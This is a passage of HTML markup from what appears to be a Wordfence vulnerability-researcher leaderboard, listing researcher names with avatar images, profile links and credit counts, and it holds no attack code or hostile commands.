					<img decoding="async" src="https://www.gravatar.com/avatar/45ee168e3ec0bb91083d6bb57a00e229.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45ee168e3ec0bb91083d6bb57a00e229"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mukhlis-amien" target="_blank" rel="noopener">Mukhlis Amien</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2e52c2cb2bdde3798dc1a0ad0bab7470.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2e52c2cb2bdde3798dc1a0ad0bab7470"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tarcisio-luchesipoystick" target="_blank" rel="noopener">Tarcísio Luchesi(Poystick)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8b3f0797781c7ba63352fd9b82ef63a9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8b3f0797781c7ba63352fd9b82ef63a9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi" target="_blank" rel="noopener">Khaled Alenazi (Nxploited)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f136390468287a6e9b71b79fe2a17e76.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f136390468287a6e9b71b79fe2a17e76"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nia" target="_blank" rel="noopener">Nia</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5289964fa4dd52b6eccff68e7a6df156.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5289964fa4dd52b6eccff68e7a6df156"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener">Vaibhav Narkhede</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9bf72594e071c28445ed7a1be0de1a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9bf72594e071c28445ed7a1be0de1a23"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener">Chloe Chamberland</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dave-jong" target="_blank" rel="noopener">Dave Jong</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/86d39645cda69d6da0e000d9158634e7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86d39645cda69d6da0e000d9158634e7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/youssef-massoudi" target="_blank" rel="noopener">Youssef massoudi</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8e4cd282e790f13211a36b16698009cb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e4cd282e790f13211a36b16698009cb"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener">Nguyen Dinh Hai (HaiND)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0112689c0902c446cae4406a12504fb2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0112689c0902c446cae4406a12504fb2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdoo-slax" target="_blank" rel="noopener">sl4x0</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener">Bao &#8211; BlueRock</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1cc663e2f3efb377e8165cec61197c25.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1cc663e2f3efb377e8165cec61197c25"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/k-sorrachat" target="_blank" rel="noopener">K. Sorrachat</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/21d84c9bfb9b111185328d94d86b38d5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="21d84c9bfb9b111185328d94d86b38d5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/or-benit" target="_blank" rel="noopener">Or Benit</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1a5d302225f6ffcbb6f31b7b9ca2ffc4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1a5d302225f6ffcbb6f31b7b9ca2ffc4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-hpt-vietnam-corporation" target="_blank" rel="noopener">Nguyen Ba Khanh &#8211; HPT Vietnam Corporation</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5a50351dc3a5975487697a55ad3936d5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a50351dc3a5975487697a55ad3936d5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uko-2" target="_blank" rel="noopener">UKO</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d996746957e68308f3af4295949d729c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d996746957e68308f3af4295949d729c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vincent-theriault-laine" target="_blank" rel="noopener">Vincent Theriault-Laine</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/755c27bc10b9191ede88f572e832d542.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="755c27bc10b9191ede88f572e832d542"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/son-van-mrs0x06" target="_blank" rel="noopener">Son Van (mrs0x06)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bc0ca0683e2f48d801834cc849d05ed9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bc0ca0683e2f48d801834cc849d05ed9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zickzick2" target="_blank" rel="noopener">zickzick2</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/482f7d5936d2268f1f9cdaa84f3867db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="482f7d5936d2268f1f9cdaa84f3867db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cuokon" target="_blank" rel="noopener">cuokon</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/336a4835171563e9c198b2d4dee1fa34.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="336a4835171563e9c198b2d4dee1fa34"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaki-zaki" target="_blank" rel="noopener">zakaria</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5a9694ec4dc4027d7cceada3b72f41fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a9694ec4dc4027d7cceada3b72f41fa"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chinhnguyen" target="_blank" rel="noopener">ChinhNguyen</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4c2bd6964b38518385c4e8d1791fd762.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c2bd6964b38518385c4e8d1791fd762"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener">zaim</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1c4391be2148aea7fca24075cd6c4c20.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1c4391be2148aea7fca24075cd6c4c20"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tal-kantor" target="_blank" rel="noopener">Tal Kantor</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2c009f880c37af5ab9adcc8490628a98.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2c009f880c37af5ab9adcc8490628a98"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-nguyen" target="_blank" rel="noopener">Nguyen Ngoc Duc (duc193)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xzenko" target="_blank" rel="noopener">0xzenko</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/807a1a84f7f8e0b4eb76852c9e02e21d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="807a1a84f7f8e0b4eb76852c9e02e21d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mykel-nelson" target="_blank" rel="noopener">Mykel Nelson</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1ca6e24c1152dfd748d1d9f882bdced9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1ca6e24c1152dfd748d1d9f882bdced9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/coopernicus" target="_blank" rel="noopener">Coopernicus</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cacf4ee88693364dcf8ccac51b575d6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cacf4ee88693364dcf8ccac51b575d6b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luis-koleski" target="_blank" rel="noopener">Luis Koleski</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3f87b1e29a7dffa171d90f689dfa86c7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3f87b1e29a7dffa171d90f689dfa86c7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sahraoui-aymen" target="_blank" rel="noopener">SAHRAOUI AYMEN</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f7a401ff0c9706d16cdb8dd3bdf72a6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f7a401ff0c9706d16cdb8dd3bdf72a6b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener">Spy0x7</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2400719fbf58ba13f3eda25084096ad3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2400719fbf58ba13f3eda25084096ad3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/swat-2" target="_blank" rel="noopener">swat</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/848ff46b2a1d687cc8e2670b302e1548.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="848ff46b2a1d687cc8e2670b302e1548"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/civitasmass" target="_blank" rel="noopener">Civitasmass</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ac6bf1005b916352d965412b8d10a2a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ac6bf1005b916352d965412b8d10a2a5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wei-hsiang-wang" target="_blank" rel="noopener">WEI HSIANG WANG</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/48c75fb70feac5c77a422be7b9c6a1f8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="48c75fb70feac5c77a422be7b9c6a1f8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/non-nss" target="_blank" rel="noopener">zalomkiller</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c2f379550a74607b173a9a120b640a71.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c2f379550a74607b173a9a120b640a71"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-quang-truong-roll" target="_blank" rel="noopener">Nguyen Truong (Roll)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/531a20fc5603f1e53d92613733a0fa01.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="531a20fc5603f1e53d92613733a0fa01"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/endang-alfarisi" target="_blank" rel="noopener">Endang Alfarisi</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/416da74662adf95005d209efd456836e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="416da74662adf95005d209efd456836e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taichi-kashimura" target="_blank" rel="noopener">Taichi Kashimura</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/59130a0d7d2c05091f16f97f2632ad64.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="59130a0d7d2c05091f16f97f2632ad64"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/whitebyte" target="_blank" rel="noopener">whitebyte</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/391706731077de4a1e991524d6b9c870.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="391706731077de4a1e991524d6b9c870"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mark-moore" target="_blank" rel="noopener">Mark Moore</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f36c6f9e5c03ad8f37eb6faab59d90d8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f36c6f9e5c03ad8f37eb6faab59d90d8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/riyas-m-s" target="_blank" rel="noopener">Riyas M S</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joshua-martinelle" target="_blank" rel="noopener">Joshua Martinelle</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/fb7c688fd0a4e11bf489da14ffa632a3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fb7c688fd0a4e11bf489da14ffa632a3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karan-j" target="_blank" rel="noopener">Karan J</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/553cb97e15a106a04fa7e72b813e84b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="553cb97e15a106a04fa7e72b813e84b1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muhammad-sharief" target="_blank" rel="noopener">Muhammad Sharief</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/dfb3a6a61ca4c3b3c0b1dc68fdb21953.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dfb3a6a61ca4c3b3c0b1dc68fdb21953"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/drew-webber" target="_blank" rel="noopener">Drew Webber (mcdruid)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1fcd4731afa8285a12c991cc8c7bdb09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1fcd4731afa8285a12c991cc8c7bdb09"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taylsec" target="_blank" rel="noopener">Taylsec</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/05990c2d2635cef18ddf1e675469a91b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="05990c2d2635cef18ddf1e675469a91b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/louis-deschanel" target="_blank" rel="noopener">Louis Deschanel (JeanJeanLeHaxor)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3fa2c8b95407509d805e36f901ce7bdf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3fa2c8b95407509d805e36f901ce7bdf"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pascal-sun" target="_blank" rel="noopener">Pascal SUN</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/15c7bc3e71963fdd7c656346bcf8b159.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="15c7bc3e71963fdd7c656346bcf8b159"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener">Trương Hữu Phúc (truonghuuphuc)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/51ac16594069727fd09950dd36cda805.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="51ac16594069727fd09950dd36cda805"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/talal-nasraddeen" target="_blank" rel="noopener">Talal Nasraddeen</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d4ffc641ce84aa2161a00a010cfc1d18.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d4ffc641ce84aa2161a00a010cfc1d18"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sanjar-tulkinov" target="_blank" rel="noopener">Sanjar Tulkinov</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2cd055dd6c3bc3b1292e85a8a8a0cfd9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2cd055dd6c3bc3b1292e85a8a8a0cfd9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duy-khanh" target="_blank" rel="noopener">Duy Tran</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
